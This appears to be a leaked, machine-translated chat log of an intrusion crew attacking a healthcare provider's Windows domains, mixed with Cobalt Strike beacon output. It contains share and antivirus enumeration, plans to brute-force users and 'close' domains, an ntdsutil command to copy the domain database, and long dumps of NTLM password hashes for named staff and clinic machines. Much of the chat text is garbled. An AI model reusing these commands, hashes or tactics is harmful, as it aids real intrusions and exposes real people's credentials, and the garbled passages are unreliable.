Cannot enumerate antivirus. root\SecurityCenter2 WMI namespace is not available on Windows Servers
```
ITCMA-ENG01
```
====== AntiVirus ======
Engine       : Webroot SecureAnywhere
ProductEXE   : C:\Program Files (x86)\Webroot\WRSA.exe
ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
Engine       : Webroot SecureAnywhere
ProductEXE   : C:\Program Files (x86)\Webroot\WRSA.exe
ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
Engine       : Webroot SecureAnywhere
ProductEXE   : C:\Program Files (x86)\Webroot\WRSA.exe
ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe
```
ITC-DC-SVR01
```
====== AntiVirus ======
Engine       : McAfee Endpoint Security
ProductEXE   : C:\Program Files (x86)\McAfee\Endpoint Security\Threat Prevention\AMCFG.EXE
ReportingEXE : C:\Program Files\McAfee\Endpoint Security\Threat Prevention\mfeensppl.exe
Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
```
We need to look for a place from where it is allowed to do it. Yes, there is more than one, I just copied it from the log wrong. Is there more than one link at least? although it still went there on October 7. This link says whether access from this place is denied or not. The old vSphere creds don't let us in even to their own server, lol. I ... from whom?) see what it caught) we let the
```
execute-assembly /home/user/TOOLS/SharpShares.exe shares --hostlist ad_computers_names.txt
[*] Tasked beacon to run .NET program: SharpShares.exe shares --hostlist ad_computers_names.txt
[+] host called home, sent: 117883 bytes
[+] received output:
Loading hostlist from ad_computers_names.txt
[*] Parsed 20597 computer objects.
```
All are repeated, as we need)) no other LAs? Yes, half of them, where you have the admin share already visible. sessions?)
added a piece that reads from the file and not from Іdarkak?)[ ](https://mediaeveryone.com/group/snpartners-com?msg=WXExMm3N9gES3d3uu) SharpShares - I corrected it a little)[ ](https://mediaeveryone.com/group/snpartners-com?msg=6g99grAzh2vAziixR) `` 204.16.247.229 https://instwp.com - 199.127.60.227:52742 SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ ``@user9 give me your cobu by the way. ``` 10.10.39.194:636 10.10.39.194:443 10.10.39.194:389 10.10.39.194:88 10.10.39.194:80 Thank you fill in the archive all the trusts + the main AD infonu since such a crash was found, it probably should ... check the rest, should I recheck? Pinging lrhvcenter1.lrhc.local [10.10.39.194] with 32 bytes of data: Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Ping statistics for 10.10.39.194: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``Is it available? We've seen this case more than once...`` It's in linux...`` It didn't go out with the script...`` >operatingSystemServicePack: Likewise Open unknown.unknown.unknown >dNSHostName: lrhvcenter1.lrhc.local ``LRHVCENTER1 anything with processes in VM was questioned by some of the virtualization system?they are in addition to dk will be dns servers put in a separate group and then all together close this one after half an hour help colleagues close it05:32 PM tell time correct this moment when 100% loss it writes like this all that in 100% loss so habit put in brackets why is written 100% loss if it even in dns is not present? another thing `` `` beacon> shell ping LRHVCENTER [*] Tasked beacon to run: ping LRHVCENTER [+] host called home, sent: 82 bytes [+] received output: Ping request could not find host LRHVCENTER. Please check the name and try again. 
```
LRHVCENTER UNRESOLVED UNRESOLVED DOWN
```
Or is it just not visible from that scan? How do you get there? It's knocked out, it's not going to go there.
```
>dNSHostName: LRH-AriaWeb.lrhc.local
>servicePrincipalName: TERMSRV/LRH-ARIAWEB
>servicePrincipalName: TERMSRV/LRH-AriaWeb.lrhc.local
>servicePrincipalName: WSMAN/LRH-AriaWeb.lrhc.local
>servicePrincipalName: WSMAN/LRH-AriaWeb
```
`LRHVCENTER.lrhc.local` undefined (100% loss)
```
>dNSHostName: LRHCamera1.lrhc.local
>servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local:1433
>servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local
```
`LRHCAMERA1.lrhc.local` exactly SQL? why terminal? `LRH-ARIAWEB.lrhc.local` let me see the main one) yes, you have 10 PCs here in the domain, that's all you have; thrown in NAS and stuff? status on all 3 domains? well, the sorting is done, as a matter of fact
```
Backup: CPNBACKUP.lrhc.local
Hyper-V: LRHRECOVERY1.lrhc.local LRHRHRecovery2.lrhc.local
VM: LRHSRV2.lrhc.local LRHVS2.lrhc.local PMAPP01.lrhc.local OPIMAGE01.lrhc.local
```
```
WINSCRIBE.lrhc.local [10.10.41.142]
```
In the input I do not see any backups in the trusts. no backups? in the trust ffmg one server does not work, even the DA does not get in there; run the brute force on all the users. I just pinged the servers, sorted in the trusts, there are very few live servers, and no backups, NAS or Hyper-V found; now sorting servers in the entry domain, there are a lot of them and maybe we get something related to virtualization or backups?
Administrator fe58579aa5762bdc2570e85dd2e0b65e:8cb7e0d1806e8bb55dee9954e2d8bdfd beadmin aad3b435b51404eeaad3b435b51404ee:ee32e572565734a3322bbd2fd90fd750 tkadmin 378ef0f1e4545db12dca4431c6f3913d:81199155c72235ba7ee1e4b39da00702 WinScribe 48d0237d57a6a9698e5d533411003c5c:3d1a6aecc94c7ca42f1687fe84466dc3 replicadb fbfe8157f8e57933223fd1a66060b0b7:3b89729a25618c03434dc1275fe496ef replicafs 44ca886daafb03c8223fd1a66060b0b7:128b2ae749d5c25e46fce831eca0a708 wsadmin 8e763074c3c817ef0d68d65838d6d0e5:7035c23d0d3673cec64ea326511cc547 petekuttera 329cd609db9f46ee434ed058fe278f0b:e65e7043f9e8c2321284f39e830a51ba glendahoffa 74deea7f7a668094c9055ef02950a7db:94de31b62705ce9e325a95982e42752c ``Well, did it work? I injected it into the administrator's process, make no yoze with a direct quote token, and everything works without the token? >dNSHostName: Winscribe.ffmg.local >operatingSystem: Windows Server 2003 ``` ``` >dNSHostName: CLINIC.ffmg.local >operatingSystem: Windows Server 2003 Is there a wine at all? 
with tokens it won't let cmd run
```
beacon> shell dir \\10.5.50.15\C$
[*] Tasked beacon to run: dir \\10.5.50.15\C$
[+] host called home, sent: 50 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.5.50.15\C$ (token): 1349
```
```
beacon> shell dir \\10.5.50.2\C$
[*] Tasked beacon to run: dir \\10.5.50.2\C$
[+] host called home, sent: 49 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.5.50.2\C$ (token): 1349
```
Without counting the current machine, there are two live servers, a total of 3/9 in the domain
```
Pinging WINSCRIBE.ffmg.local [10.5.50.15] with 32 bytes of data:
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Ping statistics for 10.5.50.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
Pinging CLINIC.ffmg.local [10.5.50.2] with 32 bytes of data:
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Ping statistics for 10.5.50.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
CLINIC
CLINIC2
CLINICDC
WINDOWSUPDATE
REPLICAFS1
WINSCRIBE
REPLICA
LIGHTSPEED
CLINICDC2
```
:muscle: good job. backups, NAS, virtualization, preparing to close 3 domains, all) pipe pulled in?
[DC] 'ffmg.local' will be the domain [DC] 'clinicdc.ffmg.local' will be the DC server [DC] Exporting domain 'ffmg.local' 1163 merickson 1a9beddc1916a4a37017f3ecfe38c258 544 1335 IWAM_CLINIC e19601e689bfa99443f7f4b2c92fd4cb 66080 1169 mhalvorson bf84281424e06207f752c1a4495f547a 544 1244 patacct c2f55f15067c8a66a03b9f75c85e22b5 544 1371 training d0ba34bffdc990ff4772eb5c73cf5737 66048 1447 replicafs 128b2ae749d5c25e46fce831eca0a708 66048 1256 mmoore 1d7bb4376d9960ed7faa16e01f8e3cdd 544 1482 phed 21bbac9b5bafe88b4f4d9e14b1e0f0948 512 1507 mrtg 8f1e900bcac9813b84b888c6c9247843 66048 1409 bgagner 2f3dc2e0dc1540adb4fc84e8d5ecb96a 512 1531 wsadmin 7035c23d0d3673cec64ea326511cc547 66048 1562 katrinajohnson 5b4c6335673a75f13ed948e848f00840 512 1445 drowan 600a406c2c1f2062eb9bb227bad654aa 66050 1572 bonniezimmel e907a84bfd715fb39abeb6d4a3064300 512 1151 jwilkus f049bfe885a011e816785108f613bb1d 546 1202 ohovland 38110ff938137269f2a0471a33808929 546 1168 medicaltrans e2a41cc5e882c59d66a950721675d9c1 544 1603 marilynewan 4cd06eb29cf45c53944369c960ddc84e 512 1140 dskistad c6b814406a70f8a8eff945fcb5176453 544 1411 vheifort 1726c0ed5c3ce736de4a59dcb70deac4 514 1590 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512 1426 dstrange ee8ebda55a117f1906137cd0abaec49e 514 1164 mewan 5b4c6335673a75f13ed948e848f00840 544 1585 nicoleweber ba9bae84828ea45e15c45d1e5f9e37bf 66050 1643 barbarameder fdd6105d920cb5ffbed8de6d3a16fc8c 512 1651 HP13799540225$ 7f9a157dbb26e185d79603c1e1ca552a 4096 1619 TEMP03-DRTONG$ 56cf9e5b6e91816806d38aabdf83ef51 4096 1571 drvanvalkenburg b3dc5796146168c629bd2344ba641bb1 512 1261 ssamson 31d6cfe0d16ae931b73c59d7e0c089c0 544 1214 mjnorgard 408e810859087f51940cd6d988361ff1 544 1241 petzell 3fe1968ef9446fc2dcdb7710acdf8c8e 544 1253 bschmidt 5e40fb3ca52bd24e23eced0ec3f1115e8 544 1621 datomb 5b4c6335673a75f13ed948e848f00840 512 1263 nlocsin 03433178a7d79b3d3e9ba63aa875d4fb 66082 1640 robinswanson d9e4da83ed523ab06bda61ebaa35024e 514 1193 bbaur 
a7855b78ea36d58bf38d64306e682f4f 546 1608 glenda2 41a0cf95ef2cd698846d4206e2150aea 512 1472 hthompson b63b839c95ddee3aa3ed0f1d7d62513a 514 2177 SOLARWINDS_WEBSITE 93a28d06a356d027669d73454161ffb3 66048 1129 bswanson 36ba05f307a2cbcc31cf0dcac9c64cb2 546 1513 shirleymeyer 602e94baa8f3a2c5761b79dec37d92ec 66050 1230 smartinson ceee8de8be2a3bdc5c1c268d76617758 546 1647 peggybrusven e1a277819ef9e34b4243230b63663ab4 514 1673 tanyahanstad 5cb4dc02e8fee91395dacf25be277d18 512 1257 preregistration 1623f25bc717c913c0e785b990835a70 546 1247 registration e4d1e951d92fe59746bb34b6c24ad72c 546 1685 carolpierce 5b4c6335673a75f13ed948e848f00840 512 1125 aellingson 7cfe1c76e6f61ee628910cd68cc6fbed 546 1648 megangriep 5b4c6335673a75f13ed948e848f00840 514 1542 kjorgens 26e3dab3479a026f9b9388cac0bb32d0 514 1679 emileehaugen 45c5a532738b9fa30a42f8ea48587bf6 514 1638 kimkugler 7cfe1c76e6f61ee628910cd68cc6fbed 514 1578 stephenlipson 0ff921941dae72d793e488f418f30b 66050 1591 kimklinger 5b4c6335673a75f13ed948e848f00840 512 1615 jdimke2 1f3b8ae8a302a7fb04680ce3f420637c 512 1726 jasoneggers 5b4c6335673a75f13ed948e848f00840 512 1289 KINETXSQL$ fe54a4823641a82d86271220e8695bbe 4096 1139 dcrintea 53b8304274902aa66b0cab35a26fccdc 544 1258 medical aa1ca0d0e5967c8942676d74d475e4 544 1697 staceylang 416a72f200b2f7da4a5abfad301665f2 512 1457 aerickson 5df827e6c35ee2e0e9f26a14d0685900 514 1518 marierund 038416de722248d4c0db0b34c68eb065 66048 1668 courtneyfrazier dd8eeaec27c155fe35e43f16f4d84168 514 1416 sverdorn da252e960b2c34e1bb1da4800bfdee2b 514 1413 pdoms 2fd2d807513f87a55d51ea76ed8f68f1 514 1412 mcasper af696aa831ce6bcadb1ac2690b8b9569 514 1415 dweinbar ec74b2b19dd7c9e4a2eb8ed7461dd780 514 1584 deelindholm 4697e64dec7e7c7b129765c00dae3a3f 66050 2128 IT01$ 9e4c21bcba9a986b90926044c408a714 4096 1740 lisameyers e8aa6d47847b8e2c99fd3cfe35f051e 512 1574 tempceo 21fb7bca2b6f3fdabff9288ad62ff1bd 514 1190 kdenker 2d782825f402ebf523ce5422c31a5227 66082 1143 gripley b0121e3d65f926674e464945aeddf1ca 544 
1747 sophierussell 69be67ef02c321ac27d320769fed0bcf 512 1749 gripleytest b0121e3d65f926674e464945aeddf1ca 66048 1126 avculek c0c4c300fe507080ff5c62377b55195c 544 1750 sherrimcfarren 1abe6ca510c51de5a55a42a1231a5b81 512 1279 jmosher 426adc1fa9503d802a45be29f045dc6f 544 1418 manderson 239266bb61b6a686d84204cab036be96 512 1229 rwachlarowicz 5cac67bc64b56133a61b1af214f8c2d0 544 1681 noramelby 71c6f855b625f6b88c451a86cdb81bdb 514 1595 tamaraharthun f5ec168977a081d026c4f9645e9303e2 514 1145 ijones 6ee7580d75845d96d8baa76517f4264b 544 1705 kendradenker 2d782825f402ebf523ce5422c31a5227 512 1417 mrecords 5b4c6335673a75f13ed948e848f00840 512 1565 sherrimaanum 35291d6b63c9f4ddf70c80834ea8dfe1 514 1662 supplytemp 1532d83b4f7965e623218b86602a9e93 514 1573 webconference 5b4c6335673a75f13ed948e848f00840 66050 1666 mariahokerstrom ebca32f06ce5e64c30d3e4bef85f6080 514 1672 petekutter 7423675713fb84177d9dc6dceed6a9131 512 1742 pkutter3 d8c5e4ad038d4f40665a9b5da8bcdc0a 512 1763 helmerswenson 5b4c6335673a75f13ed948e848f00840 512 1158 lab 3e89395612d185dc77d09dc80ab4139d 544 1505 pkutter2 7423675713fb84177d9dc6dceed6a9131 512 1441 lrosin 060366f3ab4cee59cfda5dc22d9c5941 514 1479 pkutter 6208a13d22b8d3994676469e3e348c79 512 1777 WINDOWSUPDATE$ 5c8e86b8ba437559ef0d89e4139349c7 4096 1779 johnirvin 5b4c6335673a75f13ed948e848f00840 512 1781 tomhegarty 05121df3fdd96d30be27a44fcf75b5c3 512 1786 markvukonich 5b4c6335673a75f13ed948e848f00840 512 1778 phillipkellar 85ceb62376586c525f8c5a7f541753ab 512 1789 lanawhiteking 3fae0e888ec3deb796cb4f1baf59b4c5 512 1791 OUTREACH01$ 3e2a9a9a1dfb0b934c78e1372051f5a091 4096 1259 jkowitz 493f5fb81b19868e9dc354a5fa9961cd 546 1246 slarson a7564b574cfa7b683826358597a8643b 546 1659 marciakempton c79b79f7006f09c9e5efee4304608bb7 514 1611 bridgetgrenier 18a60aac5e33c62d4b919ca7f1001692 514 1658 madgecourtney e4bd7f71e68c1d26a92611cd64fa3cae 514 1407 ereger 72e926193b59892fa05353669545eb453a 514 1419 kbutler 5dbb20ff0c4d681f0ba0009ba39a0ef 514 1455 eanderson 
93c6701c7cbed0e3023f9d8d40d9c8 514 1575 kimborgus 5b4c6335673a75f13ed948e848f00840 514 1219 amuxfeldt 7c0e3947902a10eb0ae30b806212c381 546 1582 deannawilliams e97080efbef8899068a2f11892ea9c85 514 1414 leleman 53a74835ef5a47c958e64fd2dde54de9 514 1694 jodeeolson b82758bd889a0f4c2bd0328789c39e23 514 1171 phokanson 27df247abba83984d992b30d26437725 546 1153 jhubbes 31caa2be4001aa2037501fe528aecf61 546 1796 davidflach 1f90d3748e7ad48d787c09c619d40139 66048 1222 pjohnson a8365c7713ff934fd450585ce45f37a6 546 1568 pattyjohnson a8365c7713ff934fd450585ce45f37a6 512 1798 TEMP06$ deeb839a9c7a5cf7f7feff6138cc4af2 4096 1549 amyneumann 5e30961fe4cf335f62de09e3470924d7 512 1818 todd.ziemke ebc2a1deef991b10154f6a1bf2479d0d 66048 1182 tmark 1613c77529e775dc94a2ca2d281791e3 544 1127 bbecker 275d29f95970d4d98f7e8a70652d8dda 544 1771 johntate dc6a9770c8ec8d065a04fd49fd16d198 512 1592 tinaeckhoff 5b4c6335673a75f13ed948e848f00840 66048 1188 wswenson a557ffd2f275dd484ee86ad2d5fc6c75 544 1546 michellelohse c23aa06230298e8b6990af4c7154e74b 512 1758 shawnellingson 1cb77b834155d1f434b90aacb8a152c9 512 1755 webinar ad4ffc7b10f3cfe742598fde57a3a94c 512 1824 bdsnaza 2222cef39d072fd5b25e330db776a4c2 512 1232 drsanderson 1fe4bfb27630ce0822ec3c88a7e8ceb6 66080 1201 dewert 5b4c6335673a75f13ed948e848f00840 544 1341 ADMIN08$ 3af095859833ed237478d8a9b78c4c59 4096 1526 ADMIN04$ 3ba870504dd9671edf26765e5855f384 4096 1368 ADMIN02$ fc18303a65a4820f2688cbbdfab90139 4096 1350 CODING11$ a9e0c63fecb1bb50c89141b4d2093dea 4096 1616 DIABETICED01$ 569931f15a10a10540782fa0f8950ae9 4096 1329 DIABETIC01$ f9c755912efa816fa15a79310696d66a 4096 1646 EKG04$ 797e43fd76855c76d4616f3d61010a8748 4096 1633 EKG03$ e1ddc8fc353e29dc037bc7e3645b9124 4096 2114 INSURANCE05$ d7d71e53dcfb92294aa1d541ead6348a 4096 1477 INUSRANCE06$ fea736b11ebc4055f3a0e9b5e7de967b 4096 1285 MEDICALTRANS11$ f7706b117bfcc4d73f6564e8c2aa6c24 4096 1291 MEDTRANST01$ fdacb7b544dbb4e57416a62d6ad4a73d 4096 1650 MEDTRANS24$ 3a1f788e7786d191ddf8cecd95ac975a 
4096 1540 MEDTRANS20$ cd2d747d526cf2abad99151443e12db1 4096 1293 MEDTRANS10$ 67185a00ddc12e054d691c5b17055f1f 4096 1296 MEDTRANS09$ 1785748439ba65655268a74b1bf4cae2 4096 1298 MEDTRANS05$ 87c0adeb12992157b1bf53daa0094bb7 4096 1284 MEDTRANS04$ 5986cd130ec92a6819018b035b3e1835 4096 1297 MEDTRANS03$ 73e5241104ec35fc77a16da8729919ad 4096 1331 ENT01$ 00a3a02e678afc3f1cc1b3427c74a4a6 4096 1301 HIS03$ 9ffda8fb210a973885ed64687521799c 4096 1308 LABOFFICE$ b8350de7ce2c7d69c80516ac5c80619a 4096 2146 LAB02$ 0d71cae27bfd6ba290c2dc4dcb58a6e9 4096 1517 trishdeutschman 2bd054b019b30ef9b4d53b1a9a6eb56b 66050 1461 shalvorson 0bd704c8a12024d095fc7cbf1ed8f72f 512 1465 nanderson 2b8efcb05bd8426f5338f6a06b7f7f09 512 1463 lniesche 4ed7184a5b83f2de1ec6d23237497c0e 512 1462 dgrefe 3cad0e0f95ca6d0c60989955d794b6b1 512 1464 bzimmel f85ebe09110f73f149a7ba58be020591 512 1130 blnurse 78001de4cfef2bf1afcdb3c2a6efffd 544 1460 bwoessner 702f70098a144bfb7c7a1457556ed95c 514 1684 aprilvculek aed6234fbf01c56c16a2521831bc6e5a 512 2148 BLCTRANS05$ 68f3358b0d47feac2942b9ff49d1b312 4096 2142 BLCNURSE02$ 5547023037dc738d985c9901a5129152 4096 2151 BLCNURSE01$ 79e1363d6878871bbe36632c664f6d4a 4096 1675 IT02$ 8b4694da4e512c09194020f90701b1e6 4096 1474 WRCRECEPTION$ f868dad2f1096572c522e56ff51c575c 4096 2197 WHTRECEPTION01$ a6bb50d21fb70416b20c68717be9d02e 4096 1711 PHARMACY01$ 9bee950ff25ec085153753ea621f8b27a 4096 1570 DRVANVALKENBURG$ 9004b38c8a78c88980669b327d260436 4096 1630 DR-TOMB$ f99781df952704f664d7df5bfb929db5 4096 1772 DR-TATE$ 98a40706e695660266392c0e9dce074d 4096 2149 DR-SWENSON$ 952d302fc8aed0b6f8a825afd063705f 4096 2169 DRNORGARD-MAC$ 541b638eeb32bd344a2f4ac2f0b55d 4096 1319 DR-KOWITZ$ 3dc71cd69625a6bdee71a1fe60404245 4096 1315 DR-KALIHER$ 1d8645068fdeea15c73337c6a43be9e7 4096 2138 DRHENDELBL$ 72252fe5b2ad55cc2e608665b086eb7c 4096 1324 PLINDHOLM$ 77cdaa15e267709c302069e9a86e7869 4096 1471 sspilde 3204577732a9532bd95dcbb0539486a0 512 1469 joachs 301a1168cc69d2a4255e44e8881c7310 512 1470 ahansen 
43fc73d691784a72ceaa65d9606f3592 512 1396 whtreception 9380147741154115433e6bda9436212b0e52 66048 1450 front d2a7d55bfa7a7183e69d69dfeceeda41 66048 1346 VERNON1$ 9bf548fdc3e20e1748140fa106ca4361 4096 2159 ONCOLOGY02$ 523fa53bf9e60b3445a2b0f8a39788a6 4096 1410 dschultz 8da5df4b55e013803ab1be9847bd4bc 512 1305 PATIENTINFO01$ 3594c1d47c352dfac0a77eb9465ed4be 4096 1304 PATIENTINFO03$ 83b8caa3964b05711b29951e497f46ac 4096 1803 stephanidyrhaug 38acbd84c347890bddb0b67ced9872c9 512 2170 REGPATINFO01$ f3db83ea90ce03c9d59f18b7d98e790b 4096 1536 CASHIER02$ c5ef9a634b52c1196ac1608b33862680 4098 2182 PATIENTINFO02$ c079c13edc63f38d43ff3ef83382236a 4098 2110 REGISTRATION01$ 3d7e32302558c0c4ba80e9dbaed449f5 4098 2111 CASHIER01$ 22c913392d573561c7009cc5a129fb60 4098 1374 REGISTRATION02$ 16db1ca289846dbf02ee9609c9d28a27 4098 1459 knelson 4f019a0452ee8e4a676f274fc355f954 512 2181 INSURANCE11$ f47c2c8290c79639f9710478d295587e 4096 1309 UROLOGY01$ e5b6b52c13493ae4dbdc30ddf6f51368 4096 2139 BLCRECEPTION$ 156c1ba2d682dd3d0081880e3d07b03d 4096 1211 gmathison 59cf57821c7934a345404fc8e43fcf7c 544 1394 meolson e3bdc12145b172b358940a203285570f 512 1359 ONCOLOGY01$ 331da257042cf50b8184e74c9715e8 4096 1283 kgullickson$ 66d364525032a0af2ce6ddff7608fb50 66080 1577 DR-UROLOGY$ 111e437573a1c0757e0ade030969aeb4 4096 1793 cynthiaknutson$ ba63c041662150375c627d163df382e9 66048 1799 ADMIN16$ 3b015d3d7bc1fb7f6b63ae4aa801fe1f 4098 1524 lisajohnson 77120a4a97532a21b5018f6abc150e2a 512 1492 snjos 952049408e1609b06c686c17cb85e36d 512 1567 DRVENNERSTROM$ 1bfa12f14519c91c1220e63d392fb5f5 4096 2116 PATIENTACCTS03$ 8b4b7896a8e0e190b49439d18c735352 4096 1150 jgeary f045401a5e4c75dbbe4c3b7d04de4628 544 1133 cnyberg fa82f78268095544cc4d907b7def29f1 544 1627 DR-LOKKEN$ 3b4cf9dc445a87cd539cec25725f5f08 4096 1744 fadelnammour 088b8ec27bc87547ea243690958e3ac6 512 1652 kimberlylarson 5de62f77575690f8153c9501032fc13c 512 1599 AntekBackup 105f046b8599099f367f272be28e43a4 66048 1430 INSURANCE04$ 
80bf6833bd5638da8fc8d03ec2fb548c 4096 1700 aslee 0679c2a1910ce60218bba46f9b40b199 66048 1262 bmoney 7c2caf0670958ed23d938b31370f3ec5 66080 1432 PATIENTACCTS05$ 1d00af409631d12994167ef90778827f 4096 1835 mlwalvatne 88cb33147a81b3a953cd3ec488659e13 66048 1452 landerson 7a78e93cd40ffafab3827b8c26710471 66048 1451 WRC01$ 80227b83e88dcdae99f92f2f9c4b1ae0 4096 1380 hmfranklin 9610a5bd075e949b52b1fc09fb8990d9 66048 1636 dennisamundson 7f5fe8d956c5f007d34ae1dd522f06b7 512 2185 DLEMBCKE$ 27b3206db0f71451ac66fbf6409629a76 4096 1458 kleahy a1232ecb9b9e514d01cc4145e784bed4 512 2632 WRCLAB$ c55a0201fd6a6f9d8a59133edd87e375 4096 1449 back 78daf3c73c9a4aeac54ac63e56d94a59 66048 2107 FAMMEDAPPT01$ 1eea9adf3e89dd1f975ac6c1a4c6eb8f 4096 1388 mjohnson 791ef17fbef4082b078d3370c3e38ffc 512 1764 alisonnyberg 036d108a06213115050eec957305993e 512 1311 PSYCH01$ 0560f82387bb2e3cc2b0aa7ae3f7af6e 4096 1678 kathleenotte 654f2a78ba47d681510bb83c1929692a 512 1841 rlfjestad 8658e527137be2043bef77b1f109717f 66048 1842 jljerger d72bf765ff46c10a813d81509e976d99 66048 1843 kaspanswick 66ca5d9051d246da0095f9b4438abca4 66048 1845 aklarson 375faab26efb75ee4acb667202b530a8 66048 2188 UROLOGY02$ 1265e6ef43e1fb3a0b6acec8cb8d4535 4096 1788 stacywilde $7105ac60400f33e1a1fd33515a201e32 512 2150 MAINTENANCE$ 210fb141b751c90ab1732e8ab100ea50 4096 1682 ADMIN12$ cb9d235c6738afb2e1d085ec19a243a0 4098 1334 IUSR_CLINIC c6fa98673090d4b7e1d5afb35e9bee8d 66080 1822 larandadrechsel fe33f0e2f0dea6137c269af5bdb8471e 512 1427 dcavazos eac9df0d9f41f7a5c8b54b2df6d0033b 512 2140 INTERNALMED91$ 0a60ac715991b17cb43f7ef90b83343b 4096 2633 arquispe 1f1f42fa606ef8651fa159af91410632 66048 1494 troers f6e3d88419421ff66c998f847ce10122 512 1354 INSURANCE09$ da29f0e0c41ed98c6974c192e77455d9 4096 1523 jerimitchell a49567804cf6c815185339671d65fbb2 512 1522 JERIMITCHELL$ 37eecd83535b58b58e8954d53f602682 4096 1128 bpetersen c1528d77dab8f3314e34945e2a721661 66080 1226 lroehl cc3539f01f68edcf34511c40a5fd56c7 544 1337 ORTHO01OLD$ 
8fe2067e26962a88a041b2cffe983c90 4096 1433 PATIENTACCTS04$ 8bd0fcfcf11735a798af4bc21aaf0e4f 4096 1431 PATIENTACCTS01$ 19ce274cf766487cd70249becde7c895 4096 1566 robertvennerstrom 9f184706e86e497fcbb3e9ba4768914d 512 1313 PATIENTACCOUNTS$ 747d92bb686ef860aca8b48a022b2cfa 4096 1837 mlohren 34d77bde8b4e251be614b7915a632a8b 66048 1227 lobowa af1766a8045f8b8b14e34927e05f21560e 544 1249 jandrews 8a20c0bb05fc9cca4996a9fd5ff72476 544 2141 DR-HORAK$ 71390b7c47471298bec922208ae47ab1 4096 2203 cmjorud 74cb2e5e4ba7b180260a1c839c9ae69b 66048 2204 arbranstad 2d9e0d2b6fef04bba4a3daab32e4232d 66048 1529 jhorak 71e77db8a282c6c55d44abb6f9c0a054 66048 1698 drmahale f39f527fb825f6ea3c93e9b0c2d7bc9f 512 1466 kbjohnson c1a593239afbce6cfe1d806758533ea9 512 1519 cherylmostue 0dbcfe529e464fd8f767eb082b2dd424 66048 1512 loiskelm 8f37fd56564f1ec544e6b2f2948bfb41 512 1737 DR-MATHISON$ 89ddc588738d1540ec04cdbbc98c1417 4096 1231 dtbjork 46045df676465a5b2b8bf98e4615bacd 66080 2200 DR-SAMSON$ c5a616473f89642e2eb85e1556670cc7 4096 1634 WRC-DR$ 2a88b22201be0af7731f2d61edf4ec83 4096 2634 reringdahl d9a475be75065aae9e07e91ed2dfba4c 66048 1610 gwennordahl ac560e65500eb28945e5fe709a61039 512 2115 PATIENTACCTS02$ bea9eeb03c24458963bd882fc007e3f6 4096 2637 saolson a3174064e5df297ceaebaf4682a611ef 66048 1663 ADMIN11$ 5b8a979bb35799f2ffcb94e602765e08 4098 1838 kacarlsrud 69902cbb1f0753b0dd420ffe93d8c37f 66048 1357 PREREG05OLD$ 7a3ce4d803bb2ceb3e62be05077864d4 4096 1530 MEDTRANSMARILYN$ 79cbe72f19fa06d3615b5eb1d7c265fc 4096 1765 jodischmidt e638115d1bed2f4559e2724bf718c68c 512 1761 hmswenson 43bbea9c86860260bb062a7afb02f83d 66048 1306 PREREG02$ d2d251565b2617af100e3a42da1a60d6 4098 2120 BLCGWENNORDAHL$ 34fba012fac91c67b0abc6c83a2ef533 4096 1804 DR-BJORK$ bd991b081aa200289f265bf24c9f0296 4096 1511 carolynanderson $6e973177c2119f032711f9e1bb63c2ac 512 1514 maryannkugler 47db18043c3cfc26460098b23f9aac 66048 1467 clpahl b788d93e4ea6359d732a376c493fff8b 66048 2641 jphagen d8b2054e1b81a0ebf9680d7b2539a358 66048 
Everything works ok
creds, but the session does not arrive
well, there is still a quarantine
+ yet, even server 2000
is it the last impregnable trust?
in this trust all XP and 2003
so there is a DC 2003 x32? seriously?
but it worked fine, and in the entry domain there was Sophos
Sophos in all the trusts
what OS?
and the text is shifting itself like this
just sit there; is there a line break? check it in the batch file
it is, yes, I copied it here crookedly
2) where is the last q?
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
```
1) check if ntdsutil.exe is not complete
```
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:26:49> shell type \\CLINICDC\C$\toddcommands\1.txt
[*] Tasked beacon to run: type \\CLINICDC\C$\toddcommands\1.txt
[+] host called home, sent: 68 bytes
[+] received output:
ntdsutil: ac in ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: ifm
Error 80070057 parsing input - illegal syntax?
ntdsutil: cr fu c:\toddcommands\ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: q
```
now again, check if the service is stopped; the assumption was that we have only redirected to the file browser, and also, to begin with, show the output
It happens that ntds catches an error or something else, then the path is more complicated
what does the tasklist say?
someone is stopping the service through the file browser, and I don't see the command dir c:\windows\temp\nds
and the easiest way to find out what's wrong is to redirect the command's output to a file on the desktop.
```
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:14> shell sc \\CLINICDC query vss
[*] Tasked beacon to run: sc \\CLINICDC query vss
[+] host called home, sent: 54 bytes
[+] received output:
